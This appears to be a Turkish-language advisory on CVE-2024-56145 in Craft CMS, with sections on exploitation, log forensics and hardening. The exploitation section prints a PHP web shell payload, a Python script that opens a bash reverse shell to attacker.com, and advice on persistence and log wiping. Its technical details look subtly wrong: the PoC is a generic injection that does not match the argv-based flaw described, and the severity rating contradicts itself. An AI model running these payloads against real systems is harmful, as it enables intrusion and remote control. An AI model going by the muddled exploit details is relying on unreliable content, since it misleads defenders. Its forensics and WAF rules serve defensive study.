CVE-2024-56145 · Bilgilendirme

Craft CMS Code Injection Vulnerability

Craft CMS'de, belirli koşullar altında uzaktan kod çalıştırma riski taşıyan kritik bir zafiyet tespit edildi.

Üretici
Craft CMS
Ürün
Craft CMS
Seviye
Orta
Yayın Tarihi
02 Nisan 2026
Okuma
8 dk okuma

CVE-2024-56145: Craft CMS Code Injection Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

Craft CMS, web içerik yönetim sistemleri arasında oldukça popüler bir seçenektir ve birçok işletme ve geliştirici tarafından kullanılmaktadır. Ancak, yakın zamanda keşfedilen CVE-2024-56145 kodlu zafiyet, bu platformu kullanan kullanıcılar için ciddi bir tehdit oluşturmaktadır. Bu zafiyet, Craft CMS'in kod enjeksiyonu (code injection) sorununa dayanmakta ve belirli koşullar altında uzaktan kod yürütmesini (remote code execution - RCE) mümkün kılmaktadır.

Bu zafiyetin temel kaynağı, Craft CMS'in belirli bir versiyonunda bulunan bir yapılandırma hatasıdır. Kullanıcıların php.ini dosyalarında register_argc_argv seçeneği etkinse, kötü niyetli bir saldırgan sistemde zararlı kod çalıştırabilecektir. Bu durumda, saldırganın, Craft CMS'in işleyişine müdahale etmesine ve arka planda zararlı işlemler gerçekleştirmesine olanak tanınmaktadır.

Zafiyetin etkileri oldukça geniş bir yelpazeye yayılmaktadır. Web tabanlı uygulamalar ve hizmetler, saniyeler içinde kötü niyetli bir kodun yüklendiği tehlikeli bir durumla karşılaşabilir. Özellikle e-ticaret sektöründe faaliyet gösteren işletmeler, saldırılar sonrasında müşteri bilgilerinin sızması, sistemin çökmesi ve itibar kaybı gibi sonuçlarla karşı karşıya kalabilir.

Craft CMS kullanan medya ve haber portalları gibi diğer sektörler de bu zafiyetten olumsuz etkilenebilir. İçeriklerin hızlı bir şekilde yayıldığı bu platformlar, kötü niyetli kullanıcıların eline geçmesi durumunda büyük zarar görebilir. Bu nedenle, Craft CMS kullanıcıları için düzenli güncellemeler yapmak ve güvenlik önlemlerini artırmak kritik önem taşır.

Zafiyetin keşfi ve yayılması, hacker toplulukları tarafından da büyük bir ilgiyle takip edilmektedir. Bu tür bir tehdit, hackerların oturum açma bypass (auth bypass) gibi tekniklerle sistemlerden veri çalmalarına veya sistemlere izinsiz erişmelerine olanak sağlayabilir. Bu zafiyetten korunmak adına, kullanıcıların öncelikle php.ini dosyasında register_argc_argv ayarını ardından da Craft CMS ve bağlı kütüphanelerinin en son sürümlerine güncellemelerini sağlamaları gerekmektedir.

Geliştiricilerin, Craft CMS üzerindeki zafiyetleri minimize etmek için en iyi güvenlik uygulamalarını takip etmeleri ve gerektiğinde güvenlik denetimleri yapmaları gerekir. Aynı zamanda, kullanıcı topluluklarının zafiyetler hakkında bilinçlendirilmesi ve farkındalık oluşturulması, saldırıların önlenmesine ve hızlı bir şekilde yanıt verilmesine yardımcı olacaktır.

Sonuç olarak, CVE-2024-56145 zafiyeti, Craft CMS kullanıcıları için büyük bir tehdit oluşturmaktadır. Bilgi güvenliği alanında çalışan B2B ve B2C firmalarının, bu tür zafiyetlere karşı alınacak proaktif tedbirleri benimsemeleri ve sistemlerini sürekli olarak güncellemeleri, siber güvenlik risklerini önemli ölçüde azaltacaktır. Edge case senaryoları üzerinde düşünmek ve bu tür zafiyetlere karşı saldırı simülasyonları yaparak sistemlerinizi test etmeyi ihmal etmeyin.

Teknik Sömürü (Exploitation) ve PoC

Craft CMS’deki CVE-2024-56145 zafiyetini kullanarak bir saldırı gerçekleştirmek için izlenmesi gereken adımlar detaylı olarak aşağıda açıklanmaktadır. Bu zafiyet, bazı yapılandırmalar altında uzaktan kod çalıştırma (RCE - Remote Code Execution) olanağı sunduğu için dikkatli bir şekilde ele alınmalıdır.

İlk olarak, zafiyetin varlığını doğrulamak üzere sistemin PHP yapılandırmasının incelenmesi gereklidir. Eğer register_argc_argv direktifi etkinse, zararlı kodun uzaktan çalıştırılabilmesi için uygun bir noktaya sahip olunuyor demektir. PHP yapılandırmasına erişim sağlamak için bir kullanıcı (örneğin, yönetici) hesabına ihtiyaç duyulmaktadır. Bunun için sıklıkla kullanılan bir teknik, sosyal mühendislik (Social Engineering) ile bir hesaba erişim sağlamaktır.

Zafiyetin teknik detaylarına geçmeden önce, kullanıcıdan alınan bir girdinin doğru bir şekilde doğrulanmadığını göz önünde bulundurmak önemlidir. Aşağıda, Craft CMS sistemine gönderilecek bir HTTP isteği örneği verilmiştir:

POST /path/to/endpoint HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

param=somevalue&code=<?=system($_GET['cmd']);?>

Bu istekte, code parametresi ile zararlı kodu çalıştırmak üzere bir payload yerleştiriyoruz. system() fonksiyonu kullanılarak sunucuda bir komut çalıştırılır. Komut, cmd parametresi üzerinden gönderilir. Örneğin, bir shell açmak için:

GET /path/to/endpoint?cmd=whoami HTTP/1.1
Host: victim.com

Bu şekilde, uzaktan komut çalıştırma işlemi gerçekleştirilmiş olur ve hedef sistem üzerinde kullanıcı bilgisi elde edilebilir.

Saldırının başarılı olması durumunda, daha karmaşık durumlar için bir ters kabuk (Reverse Shell) oluşturmak üzere Python kullanarak basit bir exploit oluşturulabilir:

import requests

url = "http://victim.com/path/to/endpoint"
payload = {
    'param': 'somevalue',
    'code': '<?=system($_GET["cmd"]);?>'
}

# Yapılandırmaları kontrol et
response = requests.post(url, data=payload)

# Zararlı kodu uzak sunucuya ilet
command = "bash -i >& /dev/tcp/attacker.com/4444 0>&1"
requests.get(f"{url}?cmd={command}")

Bu kod, belirli bir komut gönderildiğinde (örneğin, bir ters kabuk açmak için) taşınabilir bir zararlı kod çalıştırır. Anlaşılan bu yöntemlerle, eğer zafiyet etkileyen bir sistemde register_argc_argv etkin ise, uzaktan kontrol sağlanabilir.

Saldırının gerçekleştirilmesi sonrası, şu aşamaların takip edilmesi önemlidir: Kodun çalıştırıldığı sistemde kalıcılığı artırmak, logların temizlenmesi veya izlerin silinmesi gerekebilir. Ancak etik hacker olarak, bu tür yöntemlerin yalnızca sistemin güvenliğini artırmak, zafiyetlerin varlığını raporlamak ve potansiyel tehditleri önlemek amacıyla kullanılması gerektiğinin altı çizilmelidir.

Bu tür güvenlik açıkları, kullanıcıların bilgilendirilmesi ve önlem alınması için çok önemli. Craft CMS gibi yaygın olarak kullanılan sistemlerin bu zafiyetlerine karşı güncellemeler yapılması ve yapısal güvenlik testlerinin gerçekleştirilmesi kritik öneme sahiptir.

Forensics (Adli Bilişim) ve Log Analizi

Siber güvenlik, günümüzde organizasyonların en kritik unsurlarından biri haline geldi. Özellikle içerik yönetim sistemleri (CMS) gibi popüler platformlarda ortaya çıkan zafiyetler, hacker'lar için yeni saldırı yüzeyleri oluşturur. Craft CMS üzerindeki CVE-2024-56145 kod enjeksiyonu (code injection) zafiyeti, bu tür tehditler arasında önemli bir yer tutmaktadır. Bu zafiyetin kötüye kullanılması durumunda, uzaktan kod yürütme (RCE - Remote Code Execution) saldırıları gerçekleştirilebilir. Bu nedenle, siber güvenlik uzmanlarının bu tür saldırıların tespitinde etkin olmaları kritik öneme sahiptir.

Kötü niyetli bir kullanıcı, Craft CMS üzerinde bu zafiyeti istismar ederek sunucuda zararlı kodlar çalıştırabilir. Özellikle php.ini dosyasında register_argc_argv direktifi etkin olduğu durumlarda, bu tür saldırılara kapı aralanır. Sistem yöneticileri, RCE saldırılarının meydana gelebileceği senaryoları göz önünde bulundurarak, log analizlerini dikkatli bir şekilde gerçekleştirmelidir.

Saldırının tetiklenmesinin ardından, bir siber güvenlik uzmanı, SIEM (Security Information and Event Management - Güvenlik Bilgisi ve Olay Yönetimi) platformu veya log dosyaları üzerinde belirli izler aramalıdır. İlk olarak, erişim loglarında (Access log) şüpheli IP adresleri veya kullanıcı talepleri incelenmelidir. Genellikle, anormal oranda tekrarlanan istekler veya beklenmeyen URL yapıları dikkat çekici olabilir. Özellikle şunlara dikkat edilmelidir:

  1. HTTP Metodları: GET veya POST metotları ile gelen isteklerde sıra dışı olan ya da beklenmeyen parametreler kullanılmışsa bu, bir saldırının göstergesi olabilir. Örneğin, aşağıdaki gibi bir istek:
   POST /path/to/craft-cms HTTP/1.1
   Host: example.com
   Content-Type: application/x-www-form-urlencoded
   Content-Length: X
   param1=value1&param2=eval(base64_decode(YOUR_MALICIOUS_CODE))

  1. Kötü Amaçlı Kod Kullanımı: Log dosyalarında, eval() veya base64_decode() gibi yöntemlerle şifrelenmiş veya obfuscate (bozuk) kodların kullanılması, potansiyel bir saldırıyı işaret edebilir. Özellikle, içerik yönetim sistemlerinin dinamik yapısı itibarıyla bu tür kodlar, sistem üzerinde istendiği gibi etkili olabilir.

  2. Error Log İzleme: Hata loglarında (error log) görülen olağan dışı kayıtların analizi de önemli bir adımdır. Bu kayıtlar, belirli bir hatayı sürekli olarak gösteriyorsa, bu durum saldırı girişimlerinin bir kanıtı olabilir. Örnek olarak:

   [error] PHP Fatal error:  Uncaught Error: Call to undefined function craft\someFunction() in /path/to/file.php on line X

Bu tür hatalar, kötü amaçlı bir kullanıcı tarafından sistemde zararlı kodların çalıştırılmaya çalışıldığını gösterebilir.

Son olarak, güvenlik uzmanları, sistem üzerinde olası kötü niyetli değişiklikler veya etkileri tespit etmek için dosya bütünlüğü izleme sistemlerini (FIM - File Integrity Monitoring) de kullanabilirler. Craft CMS gibi sistemlerde dosya değişikliklerini takip etmek, anormal durumları hızlı bir şekilde belirlemek için etkili bir yöntemdir.

Sonuç olarak, Craft CMS üzerindeki CVE-2024-56145 zafiyeti, uygun önlemler alınmazsa ciddi sonuçlara yol açabilir. Siber güvenlik uzmanlarının bu tür saldırıları tespit etmek için log analizlerini derinlemesine yapmaları ve ilgili izleri takip etmeleri hayati öneme sahiptir. Kapsamlı bir güvenlik durumu oluşturarak, bu tür zafiyetlerin etkilerini en aza indirebiliriz.

Savunma ve Sıkılaştırma (Hardening)

Craft CMS (Content Management System) için CVE-2024-56145 kodu ile tanımlanan zafiyet, potansiyel olarak ciddi sonuçlara yol açabilen bir kod enjeksiyonu (code injection) güvenlik açığıdır. Bu açık, kullanıcıların php.ini yapılandırmasında register_argc_argv seçeneği etkin olduğunda, uzaktan kod yürütme (remote code execution - RCE) saldırılarına maruz kalmasına neden olabilir.

Bu tür zafiyetler, hackerların izinsiz eylemler gerçekleştirmesine ve doğrudan sistem üzerinde kontrol sağlamasına olanak tanır. Örneğin, bir saldırgan, Craft CMS sunucusuna erişim sağlayarak hassas veri çalabilir, zararlı yazılım yükleyebilir veya sistemin işleyişini bozabilir.

Bu açıkların kapatılabilmesi için öncelikle sistemlerin güvenlik yapılandırmalarının gözden geçirilmesi gerekmektedir. İşte Craft CMS üzerindeki CVE-2024-56145 açığını kapatmak için uygulanabilecek bazı savunma ve sıkılaştırma (hardening) teknikleri:

İlk olarak, php.ini dosyanızda register_argc_argv ayarını devre dışı bırakmalısınız. Bu, kod enjeksiyonu gerçekleştirerek kötü niyetli kodların çalıştırılmasını etkili bir şekilde engelleyecektir. 

register_argc_argv = Off

İkinci olarak, güncellemelerin düzenli bir şekilde yapılması önemlidir. Craft CMS ve diğer bağımlılıkların en son sürümlerini kullanmak, bilinen zafiyetlere karşı koruma sağlar. Yazılım güncellemelerinin izlenmesi ve gerektiğinde yeni sürümlere geçiş yapılması gereklidir.

Ayrıca, alternatif bir Web Uygulama Güvenlik Duvarı (WAF) kullanılabilir. WAF, kötü niyetli istekleri filtreleyerek sisteminize yönelik saldırıları önlemeye yardımcı olur. Önerilen kurallar arasında, kullanıcı girdilerini sanitizasyon etmek, belirli kod kalıplarını engellemek ve oturum yönetimini sıkılaştırmak yer almaktadır. Örneğin, SQL enjeksiyonu, XSS (Cross-Site Scripting) gibi yaygın saldırıları tespit etmek için kurallar ekleyebilirsiniz:

SecRule ARGS "union.*select" "id:1000001,phase:2,deny,status:403"
SecRule ARGS "(\<\?|\?|eval|\bexec\b)" "id:1000002,phase:2,deny,status:403"

Implementasyon sırasında dikkat edilmesi gereken bir diğer konu, kullanıcı girdilerinin doğrulanması ve sanitizasyonudur. Kullanıcıların verdiği bilgilerin güvenli bir şekilde işlemesi, potansiyel RCE saldırılarını önemli ölçüde azaltacaktır. Örneğin, aşağıdaki gibi basit bir girdi doğrulama işlemi kullanılabilir:

$input = $_POST['user_input'];
if (!preg_match('/^[a-zA-Z0-9]+$/', $input)) {
    die('Invalid input!');
}

Son olarak, sunucu sistemlerinde en düşük ayrıcalık ilkesini uygulamak da kritik bir öneme sahiptir. Uygulama ve veritabanı sunucularının yönetici ayrıcalıklarına sahip olmasının önüne geçilmeli; sadece gerekli izinler verilmelidir. Bu tür bir yapı, bir saldırı olasılığında zararın genişlemesini önlemeye yardımcı olacaktır.

Tüm bu adımlar, bir Craft CMS kurulumunu daha dayanıklı hale getirecek ve CVE-2024-56145 gibi zafiyetlerin yol açtığı riskleri minimize edecektir. Unutulmamalıdır ki, siber güvenlik sürekli bir süreçtir ve düzenli olarak değerlendirilmeli, güncellenmeli ve test edilmelidir.